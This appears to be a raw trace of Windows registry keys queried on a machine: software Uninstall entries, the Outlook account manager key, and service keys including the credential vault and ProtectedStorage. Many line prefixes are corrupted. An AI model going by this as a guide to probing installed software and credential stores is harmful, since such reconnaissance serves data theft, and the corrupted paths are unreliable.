\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUS_{4ACD847E-547D-493F-9A86-F73EAE1B5174}\DisplayName
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUS_{4D6FE7B6-559F-4DAC-92CF-A01C24046AEB}\DisplayName
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUS_{4EEA3D3E-989C-4DF4-AB0A-3042C0C12AA3}\DisplayName
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUS_{51CCA922-A0CC-47C4-8910-6936D97CAC2E}\DisplayName
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUS_{5AA578BB-759C-40FD-9661-A737C0884541}\DisplayName
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUS_{5C78021E-3C8E-4EDF-97EA-E9B8D808FD6D}\DisplayName
\x5bf8\x5af\x0c
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUS_{7AC3F78E-ECA0-45F4-A9CC-3E885DA23662}\DisplayName
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUS_{7B29D8B8-6A87-496C-A65E-B935E740448A}\DisplayName
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUS_{9D69691D-823D-4C3E-9B12-563A3F520366}\DisplayName
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUS_{B0D672F7-883E-4279-8E75-D97A5445AB46}\DisplayName
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUS_{B0DB9F71-E0F7-4FE6-8925-35B860CAC0C4}\DisplayName
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUS_{B4A38370-2ADB-46B0-A1B0-0C4A2F7DCA31}\DisplayName
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUS_{B9B89E01-5B6B-4F73-BC34-B2C0D8ACB4CD}\DisplayName
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUS_{BA610006-2C39-4419-9834-CF61AB24810A}\DisplayName
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUS_{DADF7E25-FFA4-4D02-BE84-1DAE62C18516}\DisplayName
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUS_{DE28B448-32E8-4E8F-84F0-A52B21A49B5B}\DisplayName
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUS_{ECFE33A3-B8B7-439A-ADE4-59FBD29EF9B8}\DisplayName
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUS_{F1A20C69-9FE5-40FD-9CD5-84EABC2EF64A}\DisplayName
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUS_{F4284D93-7AE8-4309-8CF3-9AD394F35F3A}\DisplayName
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUS_{F9F5A080-AF38-4966-9A6B-C43DCA465035}\DisplayName
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0015-0409-0000-0000000FF1CE}\DisplayName
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0015-0409-0000-0000000FF1CE}_Office14.PROPLUS_{D6A2CD7F-C90C-4B90-BBA7-2BADE2E08610}\DisplayName
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0016-0409-0000-0000000FF1CE}\DisplayName
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0016-0409-0000-0000000FF1CE}_Office14.PROPLUS_{D6A2CD7F-C90C-4B90-BBA7-2BADE2E08610}\DisplayName
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0018-0409-0000-0000000FF1CE}\DisplayName
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0018-0409-0000-0000000FF1CE}_Office14.PROPLUS_{334AA0A1-2BB1-4D74-B66A-2B2C4D9C2C87}\DisplayName
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0018-0409-0000-0000000FF1CE}_Office14.PROPLUS_{D6A2CD7F-C90C-4B90-BBA7-2BADE2E08610}\DisplayName
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0019-0409-0000-0000000FF1CE}\DisplayName
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0019-0409-0000-0000000FF1CE}_Office14.PROPLUS_{D6A2CD7F-C90C-4B90-BBA7-2BADE2E08610}\DisplayName
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-001A-0409-0000-0000000FF1CE}\DisplayName
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-001A-0409-0000-0000000FF1CE}_Office14.PROPLUS_{D6A2CD7F-C90C-4B90-BBA7-2BADE2E08610}\DisplayName
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-001A-0409-0000-0000000FF1CE}_Office14.PROPLUS_{DCE104A1-1875-4469-A83D-A5BFA6C4640F}\DisplayName
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-001B-0409-0000-0000000FF1CE}\DisplayName
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-001B-0409-0000-0000000FF1CE}_Office14.PROPLUS_{D6A2CD7F-C90C-4B90-BBA7-2BADE2E08610}\DisplayName
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-001F-0409-0000-0000000FF1CE}\DisplayName
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-001F-0409-0000-0000000FF1CE}_Office14.PROPLUS_{09A9DF49-DA06-4093-A2FD-F339211E39EA}\DisplayName
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-001F-0409-0000-0000000FF1CE}_Office14.PROPLUS_{C0BDC1DE-C35E-422B-8CBD-C1D555468720}\DisplayName
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-001F-040C-0000-0000000FF1CE}\DisplayName
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-001F-040C-0000-0000000FF1CE}_Office14.PROPLUS_{089DBFD7-8211-43B2-AAAE-5BDD8C23E3A8}\DisplayName
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-001F-040C-0000-0000000FF1CE}_Office14.PROPLUS_{ECC1D579-DC17-4B90-929C-B4A0BB35F7B3}\DisplayName
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-001F-0C0A-0000-0000000FF1CE}\DisplayName
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-001F-0C0A-0000-0000000FF1CE}_Office14.PROPLUS_{794A0574-4E2F-4D58-B2A0-D7460ACDC85C}\DisplayName
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-001F-0C0A-0000-0000000FF1CE}_Office14.PROPLUS_{8C5A05B6-FF56-480F-A0E6-9F4BCA4B4CAC}\DisplayName
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-002A-0000-1000-0000000FF1CE}_Office14.PROPLUS_{302A8FE3-EBF5-486C-A431-16A1CD914443}\DisplayName
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-002A-0000-1000-0000000FF1CE}_Office14.PROPLUS_{51CCA922-A0CC-47C4-8910-6936D97CAC2E}\DisplayName
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-002A-0000-1000-0000000FF1CE}_Office14.PROPLUS_{E4D76E88-C65F-4003-9C71-EC4306679D17}\DisplayName
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-002A-0000-1000-0000000FF1CE}_Office14.PROPLUS_{ECFE33A3-B8B7-439A-ADE4-59FBD29EF9B8}\DisplayName
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-002A-0000-1000-0000000FF1CE}_Office14.PROPLUS_{F4284D93-7AE8-4309-8CF3-9AD394F35F3A}\DisplayName
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-002A-0000-1000-0000000FF1CE}_Office14.PROPLUS_{F9F5A080-AF38-4966-9A6B-C43DCA465035}\DisplayName
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-002A-0409-1000-0000000FF1CE}_Office14.PROPLUS_{03AE1408-7BF1-4AC6-A327-E32E7799BCE4}\DisplayName
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-002C-0409-0000-0000000FF1CE}\DisplayName
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-002C-0409-0000-0000000FF1CE}_Office14.PROPLUS_{945F1D43-451D-4383-9BBE-241F37950B15}\DisplayName
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0044-0409-0000-0000000FF1CE}\DisplayName
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0044-0409-0000-0000000FF1CE}_Office14.PROPLUS_{D6A2CD7F-C90C-4B90-BBA7-2BADE2E08610}\DisplayName
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-006E-0409-0000-0000000FF1CE}\DisplayName
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-006E-0409-0000-0000000FF1CE}_Office14.PROPLUS_{688AC276-B332-4A76-AEB0-708AAAE669E5}\DisplayName
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-006E-0409-0000-0000000FF1CE}_Office14.PROPLUS_{8DD50F3B-E0BD-4E39-AF1F-2F316B4FC528}\DisplayName
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-00A1-0409-0000-0000000FF1CE}\DisplayName
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-00A1-0409-0000-0000000FF1CE}_Office14.PROPLUS_{D6A2CD7F-C90C-4B90-BBA7-2BADE2E08610}\DisplayName
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-00BA-0409-0000-0000000FF1CE}\DisplayName
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-00BA-0409-0000-0000000FF1CE}_Office14.PROPLUS_{D6A2CD7F-C90C-4B90-BBA7-2BADE2E08610}\DisplayName
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0115-0409-0000-0000000FF1CE}\DisplayName
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0115-0409-0000-0000000FF1CE}_Office14.PROPLUS_{8DD50F3B-E0BD-4E39-AF1F-2F316B4FC528}\DisplayName
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0116-0409-1000-0000000FF1CE}_Office14.PROPLUS_{03AE1408-7BF1-4AC6-A327-E32E7799BCE4}\DisplayName
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0117-0409-0000-0000000FF1CE}\DisplayName
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0117-0409-0000-0000000FF1CE}_Office14.PROPLUS_{D6A2CD7F-C90C-4B90-BBA7-2BADE2E08610}\DisplayName
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0000-0000-0000000FF1CE}\DisplayName
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0000-0000-0000000FF1CE}\DisplayVersion
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0409-0000-0000000FF1CE}\DisplayName
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0409-0000-0000000FF1CE}\DisplayVersion
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{92FB6C44-E685-45AD-9B20-CADF4CABA132}.KB4087364\DisplayName
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{92FB6C44-E685-45AD-9B20-CADF4CABA132}.KB4480055\DisplayName
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{A1EF1931-5EC5-38FE-B7D5-69FBF816716A}\DisplayName
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{A1EF1931-5EC5-38FE-B7D5-69FBF816716A}\DisplayVersion
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-1033-7B44-AB0000000001}\DisplayName
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-1033-7B44-AB0000000001}\DisplayVersion
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{AF12A465-EA47-447D-B6BF-2A82CDBE2F0E}\DisplayName
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{AF12A465-EA47-447D-B6BF-2A82CDBE2F0E}\DisplayVersion
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{B1528EAE-7E64-49DB-8CE1-514EB30BB38B}\DisplayName
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{B1528EAE-7E64-49DB-8CE1-514EB30BB38B}\DisplayVersion
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{CB2F7EDD-9D1F-43C1-90FC-4F52EAE172A1}\DisplayName
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{D09DF89B-E013-43F8-8ED8-6D6B9D4A1CDA}\DisplayName
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{D09DF89B-E013-43F8-8ED8-6D6B9D4A1CDA}\DisplayVersion
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{E284B869-7701-4A91-82C2-D3E66974A0F9}\DisplayName
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{E284B869-7701-4A91-82C2-D3E66974A0F9}\DisplayVersion
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{EE21EEE7-9D5A-4ECE-B60F-4BFA63BDA937}\DisplayName
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{EE21EEE7-9D5A-4ECE-B60F-4BFA63BDA937}\DisplayVersion
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{F3DDE26C-E9E4-4AC1-AC61-E4390A496F0F}\DisplayName
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{F3DDE26C-E9E4-4AC1-AC61-E4390A496F0F}\DisplayVersion
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{FE5BE50D-21D5-44FB-9A97-5010E68608DA}\DisplayName
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{FE5BE50D-21D5-44FB-9A97-5010E68608DA}\DisplayVersion
\x5bf8\x5afEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Uninstall\OneDriveSetup.exe\DisplayName
\x5bf8\x5afEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Uninstall\{3182483d-078b-48fa-92c2-798baa1fe27d}\DisplayName
\x5bf8\x5afEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Uninstall\{3182483d-078b-48fa-92c2-798baa1fe27d}\DisplayVersion
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\MIME\Database\Content Type\application/zip\Extension
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Account Manager\Outlook
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\DcomLaunch\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcEptMapper\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcSs\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\WOW64
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\ProgramData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\Public
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\Default
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ProgramFilesDir
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CommonFilesDir
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ProgramFilesDir (x86)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CommonFilesDir (x86)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ProgramW6432Dir
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CommonW6432Dir
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-18\ProfileImagePath
HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\AppData
HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Local AppData
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\Environment
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\RequiredPrivileges
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\gpsvc\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\gpsvc\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\gpsvc\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\gpsvc\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\gpsvc\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\gpsvc\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\gpsvc\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\gpsvc\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\gpsvc\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\CryptSvc\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\CryptSvc\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\CryptSvc\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\CryptSvc\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\CryptSvc\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\CryptSvc\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\CryptSvc\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\CryptSvc\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\CryptSvc\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ProtectedStorage\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ProtectedStorage\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ProtectedStorage\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ProtectedStorage\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ProtectedStorage\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ProtectedStorage\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ProtectedStorage\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ProtectedStorage\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ProtectedStorage\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ProtectedStorage\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AudioSrv\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AudioSrv\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AudioSrv\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AudioSrv\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AudioSrv\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AudioSrv\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AudioSrv\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AudioSrv\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AudioSrv\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AeLookupSvc\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AeLookupSvc\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AeLookupSvc\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AeLookupSvc\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AeLookupSvc\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AeLookupSvc\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AeLookupSvc\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AeLookupSvc\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AeLookupSvc\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BFE\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BFE\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BFE\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BFE\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BFE\Tag
